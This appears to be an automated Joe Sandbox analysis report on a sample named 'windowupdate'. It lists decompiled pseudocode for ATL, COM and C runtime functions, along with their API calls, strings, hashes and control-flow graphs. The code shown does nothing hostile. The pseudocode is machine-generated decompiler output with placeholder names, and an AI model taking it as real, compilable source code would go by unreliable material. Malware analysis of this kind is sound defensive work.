							_v20 = E00D3D130(_v8);
						}
						_t54 = 0;
						L28:
						_push(_t98);
						E00DC14C0(_t110, 0xd3cdd4);
						_t56 = _t54;
						return E00DC1520(_t56, _t110 - _t113 + 0x54);
					}
				}
				__eflags = _v24;
				if(_v24 == 0) {
					L27:
					__imp__CoUninitialize();
					__eflags = _t113 - _t113;
					E00DC1520(_t52, _t113 - _t113);
					_t54 = _v16;
					goto L28;
				}
				__eflags =  *0xf236b8;
				if(__eflags != 0) {
					_t70 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a0, 0, "%ls", 0);
					_t113 = _t113 + 0x18;
					__eflags = _t70 - 1;
					if(_t70 == 1) {
						asm("int3");
					}
				}
				_t58 = E00D47950(_t83, 0x2c);
				_t113 = _t113 + 4;
				_v84 = _t58;
				__eflags = _v84;
				if(__eflags == 0) {
					_v88 = 0;
				} else {
					_v88 = E00DC1350(_v84, __eflags);
				}
				_v80 = _v88;
				 *0xf236b8 = _v80;
				E00D3DD40(_t78,  *0xf236b8, _t106, 0, 0);
				E00D3C410( *0xf236b8 + 4, _t106, 1);
				__eflags =  *0xf236b8;
				if(__eflags == 0) {
					_t68 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a4, 0, "%ls", 0);
					_t113 = _t113 + 0x18;
					__eflags = _t68 - 1;
					if(__eflags == 0) {
						asm("int3");
					}
				}
				_v20 = E00D3CF20(_v8, _t106, __eflags, 4, 1);
				__eflags = _v20;
				if(__eflags < 0) {
					_t67 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a8, 0, "%ls", L"SUCCEEDED(res)");
					_t113 = _t113 + 0x18;
					__eflags = _t67 - 1;
					if(_t67 == 1) {
						asm("int3");
					}
				}
				while(1) {
					_t108 = _t113;
					_t63 = GetMessageA( &_v72, 0, 0, 0);
					__eflags = _t113 - _t113;
					__eflags = E00DC1520(_t63, _t113 - _t113);
					if(__eflags == 0) {
						break;
					}
					_t98 =  &_v72;
					_t65 = DispatchMessageA(_t98);
					__eflags = _t113 - _t113;
					E00DC1520(_t65, _t113 - _t113);
				}
				_t52 = E00D3CEF0(_v8, _t108, __eflags);
				goto L27;
			}

































                      0x00d3cb60
                      0x00d3cb68
                      0x00d3cb69
                      0x00d3cb76
                      0x00d3cb76
                      0x00d3cb78
                      0x00d3cb79
                      0x00d3cb8b
                      0x00d3cb8e
                      0x00d3cb92
                      0x00d3cb9a
                      0x00d3cb9f
                      0x00d3cba6
                      0x00d3cbad
                      0x00d3cbb3
                      0x00d3cbb7
                      0x00d3cbbd
                      0x00d3cbc0
                      0x00d3cbc5
                      0x00d3cbcd
                      0x00d3cbd2
                      0x00d3cbd5
                      0x00d3cbd8
                      0x00d3cbeb
                      0x00d3cbf0
                      0x00d3cbf5
                      0x00d3cc23
                      0x00d3cc27
                      0x00d3cc2c
                      0x00d3cc2f
                      0x00d3cc31
                      0x00d3cc5e
                      0x00d3cc62
                      0x00d3cc67
                      0x00d3cc6a
                      0x00000000
                      0x00d3cc6a
                      0x00d3cc3b
                      0x00d3cc3e
                      0x00d3cc42
                      0x00d3cc50
                      0x00d3cc50
                      0x00d3cc53
                      0x00000000
                      0x00d3cbf7
                      0x00d3cc03
                      0x00d3cc0a
                      0x00d3cc14
                      0x00d3cc14
                      0x00d3cc17
                      0x00d3cdb0
                      0x00d3cdb0
                      0x00d3cdba
                      0x00d3cdbf
                      0x00d3cdd0
                      0x00d3cdd0
                      0x00d3cbf5
                      0x00d3cc72
                      0x00d3cc76
                      0x00d3cd9e
                      0x00d3cda0
                      0x00d3cda6
                      0x00d3cda8
                      0x00d3cdad
                      0x00000000
                      0x00d3cdad
                      0x00d3cc7c
                      0x00d3cc83
                      0x00d3cc9a
                      0x00d3cc9f
                      0x00d3cca2
                      0x00d3cca5
                      0x00d3cca7
                      0x00d3cca7
                      0x00d3cca5
                      0x00d3ccaa
                      0x00d3ccaf
                      0x00d3ccb2
                      0x00d3ccb5
                      0x00d3ccb9
                      0x00d3ccc8
                      0x00d3ccbb
                      0x00d3ccc3
                      0x00d3ccc3
                      0x00d3ccd2
                      0x00d3ccd8
                      0x00d3cce8
                      0x00d3ccf8
                      0x00d3ccfd
                      0x00d3cd04
                      0x00d3cd1b
                      0x00d3cd20
                      0x00d3cd23
                      0x00d3cd26
                      0x00d3cd28
                      0x00d3cd28
                      0x00d3cd26
                      0x00d3cd35
                      0x00d3cd38
                      0x00d3cd3c
                      0x00d3cd56
                      0x00d3cd5b
                      0x00d3cd5e
                      0x00d3cd61
                      0x00d3cd63
                      0x00d3cd63
                      0x00d3cd61
                      0x00d3cd64
                      0x00d3cd64
                      0x00d3cd70
                      0x00d3cd76
                      0x00d3cd7d
                      0x00d3cd7f
                      0x00000000
                      0x00000000
                      0x00d3cd83
                      0x00d3cd87
                      0x00d3cd8d
                      0x00d3cd8f
                      0x00d3cd8f
                      0x00d3cd99
                      0x00000000

                      APIs
                      • GetCommandLineA.KERNEL32 ref: 00D3CB7E
                      • CoInitialize.OLE32(00000000), ref: 00D3CB92
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FC8
                      • new.LIBCMTD ref: 00D3CCAA
                      • GetMessageA.USER32 ref: 00D3CD70
                      • DispatchMessageA.USER32 ref: 00D3CD87
                      • CoUninitialize.OLE32 ref: 00D3CDA0
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3CDBA
                        • Part of subcall function 00D34020: CharUpperA.USER32 ref: 00D3403E
                        • Part of subcall function 00D34020: CharUpperA.USER32(00000000), ref: 00D34057
                        • Part of subcall function 00D34020: CharNextA.USER32(CCCCCCCC), ref: 00D34097
                        • Part of subcall function 00D34020: CharNextA.USER32(?), ref: 00D340AD
                        • Part of subcall function 00D34020: CharUpperA.USER32(00000000), ref: 00D340C6
                        • Part of subcall function 00D34020: CharUpperA.USER32 ref: 00D340DF
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FDD
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Char$Next$Upper$Message$CheckCommandDispatchInitializeLineStackUninitializeVars@8
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\Atlduck.cpp$RegServer$SUCCEEDED(res)$UnregServer
                      • API String ID: 1965964818-240722375
                      • Opcode ID: 2e4772dfae96dd2c3741a4b905fe6d50af0f0926a0d07c7344b21de281dc3f08
                      • Instruction ID: a3977f9cfea98fa1abb664feeda26d3a43b3df53930e8405ed98b73acfb421d4
                      • Opcode Fuzzy Hash: 2e4772dfae96dd2c3741a4b905fe6d50af0f0926a0d07c7344b21de281dc3f08
                      • Instruction Fuzzy Hash: 4761B075E10319ABDB20FBA0ED07B9EB771EB44704F101428F505BB282E7B5AA44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D47330 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 256 d47330-d47358 InitializeCriticalSectionAndSpinCount GetModuleHandleW 257 d47368-d4736c 256->257 258 d4735a-d47365 GetModuleHandleW 256->258 259 d47375-d4739d GetProcAddress * 2 257->259 260 d4736e-d47370 call d48a40 257->260 258->257 262 d4739f-d473a3 259->262 263 d473b8-d473d2 CreateEventW 259->263 260->259 262->263 264 d473a5-d473b6 262->264 265 d473d4-d473d6 call d48a40 263->265 266 d473db-d473de 263->266 264->266 265->266
                      C-Code - Quality: 100%
                      			E00D47330(void* __edx) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				struct HINSTANCE__* _t14;
				void* _t18;
				intOrPtr _t20;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t28;

				_t25 = __edx;
				InitializeCriticalSectionAndSpinCount(0xf20264, 0xfa0);
				_t14 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_v8 = _t14;
				if(_v8 == 0) {
					_v8 = GetModuleHandleW(L"kernel32.dll");
				}
				if(_v8 == 0) {
					E00D48A40(_t23, _t25, _t27, _t28, 7);
				}
				_v12 = GetProcAddress(_v8, "SleepConditionVariableCS");
				_v16 = GetProcAddress(_v8, "WakeAllConditionVariable");
				if(_v12 != 0 && _v16 != 0) {
					 *0xf2027c = _v12;
					_t20 = _v16;
					 *0xf20280 = _t20;
					return _t20;
				}
				_t18 = CreateEventW(0, 1, 0, 0);
				 *0xf20260 = _t18;
				if( *0xf20260 == 0) {
					return E00D48A40(_t23, _t25, _t27, _t28, 7);
				}
				return _t18;
			}













                      0x00d47330
                      0x00d47340
                      0x00d4734b
                      0x00d47351
                      0x00d47358
                      0x00d47365
                      0x00d47365
                      0x00d4736c
                      0x00d47370
                      0x00d47370
                      0x00d47384
                      0x00d47396
                      0x00d4739d
                      0x00d473a8
                      0x00d473ae
                      0x00d473b1
                      0x00000000
                      0x00d473b1
                      0x00d473c0
                      0x00d473c6
                      0x00d473d2
                      0x00000000
                      0x00d473d6
                      0x00d473de

                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F20264,00000FA0), ref: 00D47340
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00D4734B
                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D4735F
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D4737E
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D47390
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D473C0
                        • Part of subcall function 00D48A40: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D48A4B
                        • Part of subcall function 00D48A40: IsDebuggerPresent.KERNEL32 ref: 00D48B1B
                        • Part of subcall function 00D48A40: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D48B47
                        • Part of subcall function 00D48A40: UnhandledExceptionFilter.KERNEL32(00000007), ref: 00D48B51
                      Strings
                      • kernel32.dll, xrefs: 00D4735A
                      • WakeAllConditionVariable, xrefs: 00D47387
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D47346
                      • SleepConditionVariableCS, xrefs: 00D47375
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressExceptionFilterHandleModulePresentProcUnhandled$CountCreateCriticalDebuggerEventFeatureInitializeProcessorSectionSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 839355944-3242537097
                      • Opcode ID: 0869b48c76c3ad3c1f5633e45a41296f6734aeafc5b9fd671e4c3f4cc08a02bb
                      • Instruction ID: 2f0d6e6daff93b1980260fc66e8eebad20dca3bb0019635b37346601e3e08e6c
                      • Opcode Fuzzy Hash: 0869b48c76c3ad3c1f5633e45a41296f6734aeafc5b9fd671e4c3f4cc08a02bb
                      • Instruction Fuzzy Hash: 5F11DA74D4830AEFDB50EFA0E84EF9CBB70AB04701F14419AA915A62D1DBB45544FB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9F960 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135timeCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 268 d9f960-d9f995 call d9fb20 call d9f410 273 d9f99e-d9f9cd call d89580 call d8e560 call d8e620 268->273 274 d9f997-d9f999 268->274 282 d9f9cf-d9f9e1 call d8e5c0 273->282 283 d9f9e6-d9fa18 call d8eae0 * 3 call d9fe00 273->283 275 d9fb0c-d9fb11 274->275 282->275 293 d9fa1d-d9fa27 283->293 294 d9fa29-d9fa46 call d82f70 call d8e5c0 293->294 295 d9fa4b-d9fa51 293->295 294->275 296 d9fa58-d9fa66 295->296 297 d9fa53 call d8ece0 295->297 300 d9fa68-d9fa72 296->300 301 d9fa85-d9faad call d8eae0 call d8ea70 296->301 297->296 300->301 303 d9fa74-d9fa82 call d89480 300->303 312 d9faba-d9facb call d8e5c0 301->312 313 d9faaf-d9fab8 301->313 303->301 312->275 313->312 314 d9facd-d9faee call d9f1d0 call d9f0f0 313->314 321 d9fafb-d9fb09 call d8e5c0 314->321 322 d9faf0-d9faf5 314->322 321->275 322->321
                      C-Code - Quality: 97%
                      			E00D9F960(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, char _a12, void* _a16) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				void* __edi;
				void* __esi;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t64;
				signed int _t65;
				signed int _t104;
				char _t117;
				void* _t125;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_t134 = __eflags;
				E00D9FB20(_a12, _a16);
				_t54 = E00D9F410(__ebx, _t125, _t134, _a4);
				_t129 = _t127 + 0xc;
				_v16 = _t54;
				if(_v16 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_t56 = E00D89580(0x220, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\mbstring\\mbctype.cpp", 0x19a);
					_t130 = _t129 + 0x10;
					E00D8E560( &_v8, _t56);
					__eflags = E00D8E620( &_v8) & 0x000000ff;
					if(__eflags != 0) {
						memcpy(E00D8EAE0( &_v8),  *(_a12 + 0x48), 0x88 << 2);
						 *(E00D8EAE0( &_v8)) = 0;
						_t64 = E00D9FE00(__ebx,  &_v8, _v16,  *(_a12 + 0x48) + 0x110, __eflags, _v16, E00D8EAE0( &_v8)); // executed
						_t132 = _t130 + 0x14;
						_v12 = _t64;
						__eflags = _v12 - 0xffffffff;
						if(_v12 != 0xffffffff) {
							_t65 = _a8 & 0x000000ff;
							__eflags = _t65;
							if(_t65 == 0) {
								_t65 = E00D8ECE0();
							}
							asm("lock xadd [edx], eax");
							__eflags = (_t65 | 0xffffffff) == 1;
							if((_t65 | 0xffffffff) == 1) {
								__eflags =  *(_a12 + 0x48) - 0xdf6548;
								if(__eflags != 0) {
									L00D89480(__eflags,  *(_a12 + 0x48), 2);
									_t132 = _t132 + 8;
								}
							}
							 *(E00D8EAE0( &_v8)) = 1;
							 *(_a12 + 0x48) = E00D8EA70( &_v8);
							_t117 = _a12;
							__eflags =  *(_t117 + 0x350) & 0x00000002;
							if(( *(_t117 + 0x350) & 0x00000002) != 0) {
								L13:
								_v28 = _v12;
								E00D8E5C0( &_v8);
								return _v28;
							} else {
								_t104 =  *0xdf67cc; // 0xfffffffe
								__eflags = _t104 & 0x00000001;
								if(__eflags == 0) {
									E00D9F0F0(__eflags, 5, E00D9F1D0( &_v40,  &_a12,  &_a16));
									__eflags = _a8 & 0x000000ff;
									if((_a8 & 0x000000ff) != 0) {
										 *0xdf61e4 =  *_a16;
									}
									_v32 = _v12;
									E00D8E5C0( &_v8);
									return _v32;
								}
								goto L13;
							}
						}
						 *((intOrPtr*)(L00D82F70( &_v8))) = 0x16;
						_v24 = 0xffffffff;
						E00D8E5C0( &_v8);
						return _v24;
					}
					_v20 = 0xffffffff;
					E00D8E5C0( &_v8);
					return _v20;
				}
				return 0;
			}

























                      0x00d9f960
                      0x00d9f972
                      0x00d9f97e
                      0x00d9f983
                      0x00d9f986
                      0x00d9f995
                      0x00d9f9af
                      0x00d9f9b4
                      0x00d9f9bb
                      0x00d9f9cb
                      0x00d9f9cd
                      0x00d9f9fb
                      0x00d9fa05
                      0x00d9fa18
                      0x00d9fa1d
                      0x00d9fa20
                      0x00d9fa23
                      0x00d9fa27
                      0x00d9fa4b
                      0x00d9fa4f
                      0x00d9fa51
                      0x00d9fa53
                      0x00d9fa53
                      0x00d9fa61
                      0x00d9fa65
                      0x00d9fa66
                      0x00d9fa6b
                      0x00d9fa72
                      0x00d9fa7d
                      0x00d9fa82
                      0x00d9fa82
                      0x00d9fa72
                      0x00d9fa8d
                      0x00d9fa9e
                      0x00d9faa1
                      0x00d9faaa
                      0x00d9faad
                      0x00d9faba
                      0x00d9fabd
                      0x00d9fac3
                      0x00000000
                      0x00d9faaf
                      0x00d9faaf
                      0x00d9fab5
                      0x00d9fab8
                      0x00d9fae0
                      0x00d9faec
                      0x00d9faee
                      0x00d9faf5
                      0x00d9faf5
                      0x00d9fafe
                      0x00d9fb04
                      0x00000000
                      0x00d9fb09
                      0x00000000
                      0x00d9fab8
                      0x00d9faad
                      0x00d9fa2e
                      0x00d9fa34
                      0x00d9fa3e
                      0x00000000
                      0x00d9fa43
                      0x00d9f9cf
                      0x00d9f9d9
                      0x00000000
                      0x00d9f9de
                      0x00000000

                      APIs
                        • Part of subcall function 00D9F410: GetOEMCP.KERNEL32(00000000), ref: 00D9F445
                      • __wcstombs_l.LIBCMTD ref: 00D9F9AF
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9F9BB
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 00D9F9A3
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                      • API String ID: 2681442900-426720447
                      • Opcode ID: 4b96bfeb63b6be63a6bfc98d7eb5af631a8b54d91595c3fbdbe3872b27f2b937
                      • Instruction ID: 3da7ed6e3e1119d444f34af02f28a522fe9ecf832f640e456a7e9eae5d9b9b7b
                      • Opcode Fuzzy Hash: 4b96bfeb63b6be63a6bfc98d7eb5af631a8b54d91595c3fbdbe3872b27f2b937
                      • Instruction Fuzzy Hash: 03513F71900209ABCB04EF64C8929EE7775FF55314F2445A8F515AB292EB31EE05DFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9F5F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 325 d9f5f0-d9f60f 326 d9f87b-d9f885 325->326 327 d9f615-d9f62b GetCPInfo 325->327 328 d9f896-d9f8a0 326->328 327->326 329 d9f631-d9f63b 327->329 330 d9f94b-d9f958 call d47280 328->330 331 d9f8a6-d9f8ad 328->331 332 d9f64c-d9f656 329->332 334 d9f8af-d9f8b6 331->334 335 d9f8ee-d9f8f5 331->335 336 d9f658-d9f66b 332->336 337 d9f66d-d9f692 332->337 334->335 339 d9f8b8-d9f8ec 334->339 340 d9f8f7-d9f8fe 335->340 341 d9f936-d9f93f 335->341 336->332 343 d9f6a3-d9f6ae 337->343 344 d9f946 339->344 340->341 347 d9f900-d9f934 340->347 341->344 345 d9f700-d9f75a call da5170 call da8fb0 343->345 346 d9f6b0-d9f6bf 343->346 344->328 358 d9f75f-d9f7a6 call da8fb0 345->358 349 d9f6d0-d9f6e0 346->349 347->344 351 d9f6fe 349->351 352 d9f6e2-d9f6ec 349->352 351->343 352->351 354 d9f6ee-d9f6fc 352->354 354->349 361 d9f7b7-d9f7c1 358->361 362 d9f7c7-d9f7d8 361->362 363 d9f876 361->363 364 d9f7da-d9f812 362->364 365 d9f814-d9f825 362->365 363->330 366 d9f871 364->366 367 d9f861-d9f86a 365->367 368 d9f827-d9f85f 365->368 366->361 367->366 368->366
                      C-Code - Quality: 97%
                      			E00D9F5F0(void* __edi, signed int _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				struct _cpinfo _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _t121;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t157;
				signed int _t173;
				signed int _t175;
				signed int _t182;
				signed int _t201;
				signed int _t209;
				void* _t211;
				void* _t212;
				signed int _t213;

				_t211 = __edi;
				_t121 =  *0xdf600c; // 0x71e60372
				_v8 = _t121 ^ _t213;
				_t123 = _a4;
				if( *(_a4 + 4) == 0xfde9) {
					L25:
					_v1824 = 0;
					while(1) {
						__eflags = _v1824 - 0x100;
						if(_v1824 >= 0x100) {
							goto L36;
						}
						__eflags = _v1824 - 0x41;
						if(_v1824 < 0x41) {
							L31:
							__eflags = _v1824 - 0x61;
							if(_v1824 < 0x61) {
								L34:
								_t123 = _a4 + _v1824;
								__eflags = _t123;
								 *((char*)(_t123 + 0x119)) = 0;
							} else {
								__eflags = _v1824 - 0x7a;
								if(_v1824 > 0x7a) {
									goto L34;
								} else {
									_t123 = _a4 + _v1824;
									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
									_t187 = _a4 + _v1824;
									 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 - 0x20;
								}
							}
						} else {
							__eflags = _v1824 - 0x5a;
							if(_v1824 > 0x5a) {
								goto L31;
							} else {
								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
								_t187 = _v1824 + 0x20;
								_t123 = _a4 + _v1824;
								 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 + 0x20;
							}
						}
						_t157 = _v1824 + 1;
						__eflags = _t157;
						_v1824 = _t157;
					}
				} else {
					_t187 = _a4;
					if(GetCPInfo( *(_a4 + 4),  &_v1820) == 0) {
						goto L25;
					} else {
						_v1824 = 0;
						while(_v1824 < 0x100) {
							 *((char*)(_t213 + _v1824 - 0x104)) = _v1824;
							_v1824 = _v1824 + 1;
						}
						 *((char*)(_t213 + 0xfffffffffffffefc)) = 0x20;
						_v1828 = _t213 + 0xfffffffffffff8ee;
						while(1) {
							__eflags =  *_v1828 & 0x000000ff;
							if(__eflags == 0) {
								break;
							}
							_v1824 =  *_v1828 & 0x000000ff;
							while(1) {
								_t149 = _v1828;
								__eflags = _v1824 - ( *(_t149 + 1) & 0x000000ff);
								if(_v1824 > ( *(_t149 + 1) & 0x000000ff)) {
									break;
								}
								__eflags = _v1824 - 0x100;
								if(_v1824 < 0x100) {
									 *((char*)(_t213 + _v1824 - 0x104)) = 0x20;
									_t209 = _v1824 + 1;
									__eflags = _t209;
									_v1824 = _t209;
									continue;
								}
								break;
							}
							_t151 = _v1828 + 2;
							__eflags = _t151;
							_v1828 = _t151;
						}
						E00DA5170(_t153, _t211, _t212, __eflags, 0, 1,  &_v264, 0x100,  &_v1800,  *(_a4 + 4), 0);
						E00DA8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_a4 + 4), 0); // executed
						_t187 = _a4;
						_t123 = E00DA8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_a4 + 4), 0);
						_v1824 = 0;
						while(1) {
							__eflags = _v1824 - 0x100;
							if(_v1824 >= 0x100) {
								break;
							}
							_t201 = _v1824;
							__eflags =  *(_t213 + _t201 * 2 - 0x704) & 1;
							if(( *(_t213 + _t201 * 2 - 0x704) & 1) == 0) {
								_t173 = _v1824;
								_t187 =  *(_t213 + _t173 * 2 - 0x704) & 2;
								__eflags =  *(_t213 + _t173 * 2 - 0x704) & 2;
								if(( *(_t213 + _t173 * 2 - 0x704) & 2) == 0) {
									_t123 = _a4 + _v1824;
									__eflags = _t123;
									 *((char*)(_t123 + 0x119)) = 0;
								} else {
									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
									_t123 = _a4 + _v1824;
									_t182 = _v1824;
									_t187 =  *((intOrPtr*)(_t213 + _t182 - 0x304));
									 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t213 + _t182 - 0x304));
								}
							} else {
								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
								_t187 = _v1824;
								_t123 =  *((intOrPtr*)(_t213 + _t187 - 0x204));
								 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t213 + _t187 - 0x204));
							}
							_t175 = _v1824 + 1;
							__eflags = _t175;
							_v1824 = _t175;
						}
					}
				}
				L36:
				__eflags = _v8 ^ _t213;
				return E00D47280(_t123, _t153, _v8 ^ _t213, _t187, _t211, _t212);
			}
























                      0x00d9f5f0
                      0x00d9f5fb
                      0x00d9f602
                      0x00d9f605
                      0x00d9f60f
                      0x00d9f87b
                      0x00d9f87b
                      0x00d9f896
                      0x00d9f896
                      0x00d9f8a0
                      0x00000000
                      0x00000000
                      0x00d9f8a6
                      0x00d9f8ad
                      0x00d9f8ee
                      0x00d9f8ee
                      0x00d9f8f5
                      0x00d9f936
                      0x00d9f939
                      0x00d9f939
                      0x00d9f93f
                      0x00d9f8f7
                      0x00d9f8f7
                      0x00d9f8fe
                      0x00000000
                      0x00d9f900
                      0x00d9f913
                      0x00d9f919
                      0x00d9f928
                      0x00d9f92e
                      0x00d9f92e
                      0x00d9f8fe
                      0x00d9f8af
                      0x00d9f8af
                      0x00d9f8b6
                      0x00000000
                      0x00d9f8b8
                      0x00d9f8d1
                      0x00d9f8da
                      0x00d9f8e0
                      0x00d9f8e6
                      0x00d9f8e6
                      0x00d9f8b6
                      0x00d9f88d
                      0x00d9f88d
                      0x00d9f890
                      0x00d9f890
                      0x00d9f615
                      0x00d9f61c
                      0x00d9f62b
                      0x00000000
                      0x00d9f631
                      0x00d9f631
                      0x00d9f64c
                      0x00d9f664
                      0x00d9f646
                      0x00d9f646
                      0x00d9f675
                      0x00d9f68c
                      0x00d9f6a3
                      0x00d9f6ac
                      0x00d9f6ae
                      0x00000000
                      0x00000000
                      0x00d9f6b9
                      0x00d9f6d0
                      0x00d9f6d0
                      0x00d9f6da
                      0x00d9f6e0
                      0x00000000
                      0x00000000
                      0x00d9f6e2
                      0x00d9f6ec
                      0x00d9f6f4
                      0x00d9f6c7
                      0x00d9f6c7
                      0x00d9f6ca
                      0x00000000
                      0x00d9f6ca
                      0x00000000
                      0x00d9f6ec
                      0x00d9f69a
